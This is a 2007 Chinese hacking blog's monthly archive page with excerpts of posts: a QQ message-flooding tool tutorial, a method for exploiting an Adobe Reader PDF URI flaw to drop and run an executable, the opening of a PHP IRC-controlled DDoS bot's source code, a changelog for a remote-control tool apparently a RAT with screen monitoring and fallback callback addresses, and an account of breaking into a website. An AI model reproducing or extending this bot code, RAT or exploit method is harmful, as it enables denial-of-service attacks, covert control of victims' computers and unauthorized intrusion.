2007年10月 的日志

利用BCB自己打造QQ炸弹

2007/10/22 10:53 | 鬼仔 | 技术文章 | 消灭0回复

来源:灰狐's Blog

注:本文已发表在2007年《黑客防线》第10期,版权归《黑客防线》所有。

俗话说的好啊:不会编程的黑客就不是好黑客(我会编程,但我也不是黑客,因为我是个——程序员,哈哈)。今天呢我们就来亲自动手打造一个专属于自己的小工具。
我们要做的是一个QQ炸弹,这年头用QQ的人实在多。这林子大了可是什么鸟都有,当然其实我们今天做这个工具的威力并不是很大,顶多只能和好友聊天的时候骚扰一下。思路很简单,就是通过程序不停地模拟按键Ctrl+Enter自动发送消息,不过当我们做成的时候心里自然也会有那么一种满足和喜悦。
编程工具的选择其实很重要,像这样的小东东如果用VC来做那真不是一般地麻烦,什么?你说delphi很快?那倒是,不过会pascal的肯定没会C 阅读全文 »

Tags: ,

Adobe pdf reader URI利用方式浅析

2007/10/22 10:26 | 鬼仔 | 技术文章 | 消灭0回复

来源:大能寺

poc有人已经公布了.利用方式基本上清一色的tftp,tftp利用起来有限制,防火墙的因素.那么简单说说另外一种利用方式–捆绑exe生成并执行.
首先这个漏洞可以执行任意命令.我没试过直接在mailto那里直接echo exe.貌似好写很多行&哦.这样太疯狂.
在PDF格式中第一行必须有%PDF-1.7%.这个跟jpg,gif没什么区别.如果没%pdf-1.7%,那么adobe reader提示是无效pdf.
关于PDF的详解情况,可以参见(http://www.adobe.com/devnet/pdf/pdf_reference.html).

这里牵涉到另外一个知识点.copy +b来合并文件.这样子合并一个exe和jpg,exe和jpg都能执行.
好,那写段脚本,vb 阅读全文 »

Tags: , ,

PHP DDoS Bot

2007/10/21 11:02 | 鬼仔 | 工具收集 | 消灭0回复

来源:amxku's blog

<?php
/*
PHP ddos bot
Version 1.0
*/
$server="1.3.3.7";
$Port="6667";
$nick="bot-";$willekeurig;
$willekeurig=mt_rand(0,3);
$nicknummer=mt_rand(100000,999999);
$Channel="#WauShare";
$Channelpass="ddos";
$msg="Farewell.";

set_time_limit(0);
$loop = 0; $verbonden = 0;
$verbinden = fsockopen($server, $Port);

while ($read = fgets($verbinden,512)) {
阅读全文 »

Tags: ,

irat – 内测版 1010

2007/10/20 12:31 | 鬼仔 | 工具收集 | 消灭0回复

来源:XG's Blog

history

说明

修正bug
[+]增加功能
[-]去掉功能
[PS]附加说明

2007-10-10 var 1.2 b6

关闭客户端当有聊天窗口服务端不能关闭

服务端有时CPU占用100%

屏幕监控界面改进

修改备注要重启服务端显示
[+]屏幕监控鼠标轨迹
[+]屏幕监控保存为jpg格式图片
[+]备用上线地址
[+]消息广播
[+]3端口同时监听
[+]被控端解析program files目录
[-]被控端解析temp目录

2007-10-7 16:47:09 var 1.1 b5

屏幕监控关闭后,有时服务端吃了cpu问题
[+]参数设置
[+]部分Hint提示
[+]任意可视窗口闪屏

2007-10-3 VAR 1.1 bate1
阅读全文 »

说说session

2007/10/20 12:16 | 鬼仔 | 技术文章 | 消灭0回复

作者:云舒

这几天mail list在讨论跨站获取cookie然后登陆网站的事情,昨天下午也发了一些邮件。后来看到还是有人理解不正确,而我刚好又网络坏了,发布出去邮件,快憋死了。今天早上一大早到公司就回复邮件,看来我这性子还真要改改。这里把我发的邮件贴出来,权当笔记了。下面是今天回复的邮件全文。

真的是怒了,昨天到今天一直都在说session,而且大多数是在造谣。昨天网络不通,发不出邮件,差点被憋死了。今天网络貌似不错,我来说说session,以后别老造谣了。

首先,session是由语言实现的,与web服务器无关,比如php的session是php语言实现的。

其次,session的内容是保存在服务器上面的,但是大家都知道session 阅读全文 »

Tags:

一个不为人知的感染几百万校内网用户的蠕虫分析

2007/10/20 9:12 | 鬼仔 | 技术文章 | 消灭0回复

文章作者:langouster
信息来源:邪恶八进制信息安全团队(www.eviloctal.com)

在一次查看校内网网页源程序的时候无意间发现一个校内蠕虫,开始还以为是我的网页有问题,就随便打开几个人的页面查看,发现许多人的页面上也有这段代码。
阅读全文 »

Tags: ,

对黑客风云网站的一次渗透经过

2007/10/20 8:30 | 鬼仔 | 技术文章 | 消灭0回复

文章已发表黑客X档案2007年11期 转载请著名
文章作者:小志& 伤心的鱼[SST

正文:

最近无聊的要命每天都无聊的过日子,正好这天无意中逛到了黑客风云的论坛。想想当初自己也在这做斑竹学技术呢,呵呵,既然没什么事,就免费的给他们做下检测吧(小编注:貌似有那么一点‘恩将仇报’的感觉)。于是乎拉上小志操起啊D,就准备战斗了……

首先打开百度搜索“site:05112.com”,我的习惯是渗透一个站之前总喜欢看看这个站的信息。大概找到54000多条信息,看了下风云主站全是 HTML的连接,论坛用的是PHPWind,貌似俺也没有PHPWind的0day。另外像这种黑客站点肯定不会有什么注入上传之类的。虽然知道他后台用的是动易系统,直接在地址后加上admin/admin_login.asp, 阅读全文 »

Tags:

关于URL解析漏洞在PDF文档中的利用

2007/10/19 2:20 | 鬼仔 | 技术文章 | 5 个回复

作者:zwell
来源:NOSEC

右键另存再打开测试文档,否则会调用IE的插件打开,测试会失败。如果你硬要通过点击打开的话,点击这里吧,嘿嘿,这本身也是IE的一个解析漏洞。

在 http://seclists.org/fulldisclosure/2007/Oct/0068.html 看到这个漏洞的时候,一时还没有想到怎么利用。后来结合去年有一个关于pdf actions安全隐患的这么一个问题(参看 http://michaeldaw.org/md-hacks/backdooring-pdf-files/ 阅读全文 »

Tags: